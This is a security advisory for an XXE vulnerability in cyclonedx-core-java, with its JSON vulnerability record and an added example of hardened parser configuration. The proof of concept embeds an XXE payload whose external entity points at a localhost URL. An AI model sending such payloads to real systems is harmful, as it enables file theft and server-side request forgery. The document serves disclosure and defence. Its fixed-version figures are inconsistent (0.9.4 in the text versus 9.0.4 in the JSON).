GHSA-683X-4444-JXH8

Vulnerability from github – Published: 2024-06-24 20:44 – Updated: 2024-06-28 18:58
Summary
Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java
Details

Impact

Before deserializing CycloneDX Bill of Materials in XML format, cyclonedx-core-java leverages XPath expressions to determine the schema version of the BOM. The DocumentBuilderFactory used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.

XXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.

PoC

import org.cyclonedx.parsers.XmlParser;

class Poc {

    public static void main(String[] args) {
        // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused
        new XmlParser().parse("""
            <?xml version="1.0" encoding="UTF-8"?>
            <!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>
            <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
            """.getBytes());
    }

}

Patches

The vulnerability has been fixed in cyclonedx-core-java version 0.9.4.

Workarounds

If feasible, applications can reject XML documents before handing them to cyclonedx-core-java for parsing. This may be an option if incoming CycloneDX BOMs are known to be in JSON format.
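As an added illustration (not code from cyclonedx-core-java, the advisory, or its patch), the following Java class shows the two defensive measures this advisory points at: a DocumentBuilderFactory hardened along the lines of the OWASP XXE prevention cheat sheet the advisory references, used for the same kind of schema-version probe described under Impact, and a pre-parse gate that only admits JSON BOMs, as the Workarounds section suggests. The class and helper names, the `namespace-uri(/*)` XPath used as a stand-in for the library's version probe, and the JSON sniffing rule are assumptions; the feature URIs are the standard Xerces/JDK ones and are not claimed to be what the project's fix actually does.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Added example, not cyclonedx-core-java code: a hardened DocumentBuilderFactory for a
// schema-version probe, plus a JSON-only gate implementing the advisory's workaround.
class HardenedBomVersionProbe {

    // Hypothetical helper: a factory that refuses DOCTYPEs and never resolves external entities/DTDs.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Needed so namespace-uri() sees the <bom> namespace the version probe relies on.
        dbf.setNamespaceAware(true);
        // Primary control: any DOCTYPE makes the parser fail fast, before any entity is resolved.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case a DOCTYPE ever has to be tolerated elsewhere.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Hypothetical stand-in for the version probe: evaluates an XPath over the root element's
    // namespace on a hardened parser. Returns the namespace URI of the root element, or null.
    static String schemaNamespace(byte[] xml) throws Exception {
        DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(xml));
        XPath xpath = XPathFactory.newInstance().newXPath();
        String ns = (String) xpath.evaluate("namespace-uri(/*)", doc, XPathConstants.STRING);
        return ns.isEmpty() ? null : ns;
    }

    // Workaround gate (assumed rule): only documents whose first non-blank character is '{'
    // are treated as JSON BOMs; everything else is rejected before an XML parser ever runs.
    static boolean looksLikeJsonBom(byte[] data) {
        String head = new String(data, StandardCharsets.UTF_8);
        if (head.startsWith("\uFEFF")) {          // tolerate a UTF-8 byte order mark
            head = head.substring(1);
        }
        return head.stripLeading().startsWith("{");
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: a benign CycloneDX 1.5 BOM with no DOCTYPE.
        byte[] benign = """
            <?xml version="1.0" encoding="UTF-8"?>
            <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
            """.getBytes(StandardCharsets.UTF_8);
        System.out.println("benign namespace: " + schemaNamespace(benign));

        // Constructed sample with the same shape as the advisory's PoC document.
        byte[] withDoctype = """
            <?xml version="1.0" encoding="UTF-8"?>
            <!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://localhost:1010/does-not-exist/file.dtd"> %sp;]>
            <bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>
            """.getBytes(StandardCharsets.UTF_8);
        try {
            schemaNamespace(withDoctype);
            System.out.println("unexpected: DOCTYPE document was accepted");
        } catch (SAXException e) {
            // With disallow-doctype-decl the document is refused without any network access,
            // so the ConnectException seen in the advisory's PoC cannot occur.
            System.out.println("rejected by hardened parser: " + e.getMessage());
        }

        // The workaround gate turns both XML documents away regardless of parser configuration.
        System.out.println("JSON gate admits XML BOM? " + looksLikeJsonBom(withDoctype));
        byte[] json = "{\"bomFormat\": \"CycloneDX\", \"specVersion\": \"1.5\"}"
                .getBytes(StandardCharsets.UTF_8);
        System.out.println("JSON gate admits JSON BOM? " + looksLikeJsonBom(json));
    }
}
```

The disallow-doctype-decl feature is the control that matters most here: it fails the parse at the DOCTYPE itself, so the parameter entity in the advisory's PoC is never even declared, let alone fetched. The remaining feature toggles cost nothing and protect against a future change that re-enables DOCTYPE handling. The JSON gate is only an option where, as the advisory notes, incoming BOMs are known to be JSON; it is not a substitute for fixing the parser configuration.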

References

* Issue was fixed via https://github.com/CycloneDX/cyclonedx-core-java/pull/434
* Issue was introduced via https://github.com/CycloneDX/cyclonedx-core-java/commit/162aa594f347b3f612fe0a45071693c3cd398ce9
* https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
* https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.cyclonedx:cyclonedx-core-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.1.0"
            },
            {
              "fixed": "9.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-38374"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-24T20:44:48Z",
    "nvd_published_at": "2024-06-28T18:15:04Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nBefore deserializing CycloneDX Bill of Materials in XML format, _cyclonedx-core-java_ leverages XPath expressions to determine the schema version of the BOM. The `DocumentBuilderFactory` used to evaluate XPath expressions was not configured securely, making the library vulnerable to XML External Entity (XXE) injection.\n\nXXE injection can be exploited to exfiltrate local file content, or perform Server Side Request Forgery (SSRF) to access infrastructure adjacent to the vulnerable application.\n\n### PoC\n\n```java\nimport org.cyclonedx.parsers.XmlParser;\n\nclass Poc {\n\n    public static void main(String[] args) {\n        // Will throw org.cyclonedx.exception.ParseException: java.net.ConnectException: Connection refused\n        new XmlParser().parse(\"\"\"\n            \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n            \u003c!DOCTYPE bom [\u003c!ENTITY % sp SYSTEM \"https://localhost:1010/does-not-exist/file.dtd\"\u003e %sp;]\u003e\n            \u003cbom xmlns=\"http://cyclonedx.org/schema/bom/1.5\"/\u003e\n            \"\"\".getBytes());\n    }\n\n}\n```\n\n### Patches\n\nThe vulnerability has been fixed in _cyclonedx-core-java_ version 0.9.4.\n\n### Workarounds\n\nIf feasible, applications can reject XML documents before handing them to _cyclonedx-core-java_ for parsing.\nThis may be an option if incoming CycloneDX BOMs are known to be in JSON format.\n\n### References\n\n* Issue was fixed via \u003chttps://github.com/CycloneDX/cyclonedx-core-java/pull/434\u003e\n* Issue was introduced via \u003chttps://github.com/CycloneDX/cyclonedx-core-java/commit/162aa594f347b3f612fe0a45071693c3cd398ce9\u003e\n* \u003chttps://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing\u003e\n* \u003chttps://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#xpathexpression\u003e\n",
  "id": "GHSA-683x-4444-jxh8",
  "modified": "2024-06-28T18:58:48Z",
  "published": "2024-06-24T20:44:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/security/advisories/GHSA-683x-4444-jxh8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38374"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/pull/434"
    },
    {
      "type": "WEB",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java/pull/434/commits/ab0bc9c530d24f737970dbd0287d1190b129853d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/CycloneDX/cyclonedx-core-java"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in org.cyclonedx:cyclonedx-core-java"
}
